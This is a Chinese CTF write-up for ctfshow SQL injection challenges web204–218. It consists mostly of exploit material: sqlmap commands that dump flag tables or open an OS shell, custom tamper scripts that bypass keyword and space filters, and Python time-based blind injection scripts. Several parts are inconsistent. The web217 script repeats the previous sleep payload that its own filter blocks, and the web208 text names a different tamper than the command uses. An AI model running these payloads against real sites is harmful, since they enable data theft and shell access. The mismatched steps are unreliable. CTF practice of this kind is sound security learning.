题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

cookie

EXP

sqlmap -u http://79f7214f-8734-406b-b4ef-e641adf16c46.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump --cookie="PHPSESSID=bdu0d5n7fqvh0n792j4inaomld;ctfshow=d739287c1b860e51896e2a2fa728baf0"

web205

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

api调用需要鉴权,不知道是啥,不懂得去百度

EXP

sqlmap -u http://3b31b28c-6b13-4cd5-b9eb-59a27ba95fa0.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flax -C flagx --dump  --headers="Content-Type: text/plain" --safe-url=http://3b31b28c-6b13-4cd5-b9eb-59a27ba95fa0.challenge.ctf.show/api/getToken.php --safe-freq=1

web206

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."';";
//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }

解题思路

sqlmap会自己判断闭合,和上面一样做就行

EXP

sqlmap -u http://3f019c71-0464-4492-803f-fe8d758be0d4.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxc -C flagv --dump  --headers="Content-Type: text/plain" --safe-url=http://3f019c71-0464-4492-803f-fe8d758be0d4.challenge.ctf.show/api/getToken.php --safe-freq=1

web207

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
  function waf($str){
   return preg_match('/ /', $str);
  }

解题思路

开始教你使用tamper,同时题目过滤了空格,tamper是sql自带的绕过waf的功能,其中有一个是space2comment.py 用/**/代替空格

EXP

sqlmap -u http://39ffb7ca-22b0-4fa8-9ba5-d5fd7ddf513a.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxca -C flagvc --dump  --headers="Content-Type: text/plain" --safe-url=http://39ffb7ca-22b0-4fa8-9ba5-d5fd7ddf513a.challenge.ctf.show//api/getToken.php --safe-freq=1 --tamper space2comment

web208

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
// $id = str_replace('select', '', $id);
  function waf($str){
   return preg_match('/ /', $str);
  }

解题思路

这题又新加了一个把select消掉的waf,所以还要再加一个tamper,randomcomments.py 用/**/分割sql关键字

EXP

sqlmap -u http://3be8680c-a746-45f7-9524-a687d085850c.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql dbs=ctfshow_web -T ctfshow_flaxcac -C flagvca --dump  --headers="Content-Type: text/plain" --safe-url=http://3be8680c-a746-45f7-9524-a687d085850c.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper="randomcase.py,space2comment.py"

web209

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对传入的参数进行了过滤
  function waf($str){
   //TODO 未完工
   return preg_match('/ |\*|\=/', $str);
  }

解题思路

过滤了等于号和星号,这题开始要自己搓tamper了,过滤了等于号可以用like代替,直接在space2comment.py里按照原本的格式改就行了,同时过滤了型号,要把原本的tamper的空格替换改成其他的

EXP

sqlmap -u http://dd71ce86-d055-4875-a491-287d1fdf75dc.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flav -C ctfshow_flagx --dump --headers="Content-Type: text/plain" --safe-url=http://dd71ce86-d055-4875-a491-287d1fdf75dc.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '*':
                retVal += chr(0x31)
                continue
            elif payload[i] == '=':
                retVal += chr(0x0a)+"like"+chr(0x0a)
                continue
                
            elif payload[i] == '"':
                doublequote = not doublequote
                
            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    return retVal
     

web210

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }

解题思路

先看一眼代码,先对传入的数据b64解码,然后反转字符,再解码,再反转,那么我们要改的tamper就是要把payload先反转,再编码,然后反转再编码

EXP

sqlmap -u http://5432fae2-84ab-4474-b554-d08a5a73734d.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql -D ctfshow_web -T ctfshow_flavi -C ctfshow_flagxx --dump --headers="Content-Type: text/plain" --safe-url=http://5432fae2-84ab-4474-b554-d08a5a73734d.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    retVal = payload
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web211

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ /', $str);
}

解题思路

和上题一样,但是同时又对空格进行了过滤,所以要再上题的基础上替换空格

EXP

sqlmap -u http://8c4c63d8-44c8-46fa-af6a-e38917af77d2.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --dbms=mysql  -D ctfshow_web -T ctfshow_flavia -C ctfshow_flagxxa --dump --headers="Content-Type: text/plain" --safe-url=http://8c4c63d8-44c8-46fa-af6a-e38917af77d2.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += "/**/"
                    continue

            elif payload[i] == '\'':
                quote = not quote

            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += "/**/"
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web212

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

解题思路

把前面几题写的结合一下就行

EXP

sqlmap -u http://882da072-a9d3-4603-b2ee-db3be196e211.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show -D ctfshow_web -T ctfshow_flavis -C ctfshow_flagxsa --dump --headers="Content-Type: text/plain" --safe-url=http://882da072-a9d3-4603-b2ee-db3be196e211.challenge.ctf.show/api/getToken.php --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '*':
                retVal+=chr(0x31)
                continue
            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web213

题目源码

//拼接sql语句查找指定ID用户
$sql = "select id,username,pass from ctfshow_user where id = ('".$id."') limit 0,1;";
//对查询字符进行解密
  function decode($id){
    return strrev(base64_decode(strrev(base64_decode($id))));
  }
function waf($str){
    return preg_match('/ |\*/', $str);
}

解题思路

过滤词和上题一样,但要求你用-os-shell来getshell

EXP

sqlmap -u http://a882438c-4164-4d6c-b485-af1a4946c0c1.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --os-shell --headers="Content-Type: text/plain" --safe-url=http://a882438c-4164-4d6c-b485-af1a4946c0c1.challenge.ctf.show/api/getToken.php  --safe-freq=1 --tamper space2comment.py

Tamper

#!/usr/bin/env python

"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

from lib.core.compat import xrange
from lib.core.enums import PRIORITY
import base64
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character (' ') with comments '/**/'

    Tested against:
        * Microsoft SQL Server 2005
        * MySQL 4, 5.0 and 5.5
        * Oracle 10g
        * PostgreSQL 8.3, 8.4, 9.0

    Notes:
        * Useful to bypass weak and bespoke web application firewalls

    >>> tamper('SELECT id FROM users')
    'SELECT/**/id/**/FROM/**/users'
    """

    retVal = payload

    if payload:
        retVal = ""
        quote, doublequote, firstspace = False, False, False

        for i in xrange(len(payload)):
            if not firstspace:
                if payload[i].isspace():
                    firstspace = True
                    retVal += chr(0x0a)
                    continue

            elif payload[i] == '\'':
                quote = not quote
            elif payload[i] == '*':
                retVal+=chr(0x31)
                continue
            elif payload[i] == '"':
                doublequote = not doublequote

            elif payload[i] == " " and not doublequote and not quote:
                retVal += chr(0x0a)
                continue

            retVal += payload[i]
    retVal = base64.b64encode(retVal[::-1])
    retVal = base64.b64encode(retVal[::-1])
    return retVal

web214

题目源码

//无
//屏蔽危险分子

解题思路

这题连个鸡掰都没给,看一下答案说是要看主页流量的select.js在这里面发现ip和debug的post传参,试了一下发现ip=sleep(3)&&debug=0可以执行,所以可以利用这个进行时间盲注

EXP

import requests
url='http://3535ec17-a5bd-482a-b325-99a78eb68394.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)"
        #payload=f"if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagx'),{i},1))={j},sleep(2),0)#"
        payload=f"if(ascii(substr((select flaga from ctfshow_flagx),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web215

题目源码

//用了单引号
//屏蔽危险分子

解题思路

用了单引号,那就要先闭合再搞

EXP

import requests
url='http://5fd5b376-28a1-4832-9fc2-bec290ec6625.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(0,128):
        #payload=f"1' or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"1' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1))={j},sleep(2),0)#"
        payload=f"1' or if(ascii(substr((select flagaa from ctfshow_flagxc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web216

题目源码

where id = from_base64($id);
//屏蔽危险分子

解题思路

用括号闭合base64,然后继续

EXP

import requests
url='http://6ef16676-3e80-43da-bbe6-13754ed71f0e.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"'NjY2') or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"'NjY2') or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{i},1))={j},sleep(2),0)#"
        payload=f"'NjY2') or if(ascii(substr((select flagaac from ctfshow_flagxcc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web217

题目源码

where id = ($id)
    //屏蔽危险分子
    function waf($str){
        return preg_match('/sleep/i',$str);
    }   

解题思路

过滤了sleep,可以用benchmark绕过,不能无脑拉大数字,而且加个time.sleep延迟,不然网址卡爆没法出结果

EXP

import requests
url='http://6ef16676-3e80-43da-bbe6-13754ed71f0e.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"'NjY2') or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},sleep(2),0)#"
        #payload=f"'NjY2') or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxcc'),{i},1))={j},sleep(2),0)#"
        payload=f"'NjY2') or if(ascii(substr((select flagaac from ctfshow_flagxcc),{i},1))={j},sleep(2),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=2)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

web218

题目源码

where id = ($id)
    //屏蔽危险分子
    function waf($str){
        return preg_match('/sleep|benchmark/i',$str);
    }   

解题思路

过滤了benchmark,可以用其他方法拖时间

EXP

import requests
import time
url='http://d10b5a86-5d3e-4c29-a5ea-cfa81bcb7f09.challenge.ctf.show/api/'
flag=''
for i in range(1,66):
    for j in range(32,128):
        #payload=f"1) or if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        #payload=f"1) or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flagxc'),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        payload=f"1) or if(ascii(substr((select flagaaC from ctfshow_flagxc),{i},1))={j},(select count(*) from information_schema.columns A,information_schema.columns B),0)#"
        data={"ip":payload,
        "debug":0}
        try:
            r=requests.post(url,data,timeout=0.6)
        except:
            flag=flag+chr(j)
            print(flag)
            break
        if j==127:
            exit()
    if '}'in flag:
        break

待续

  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值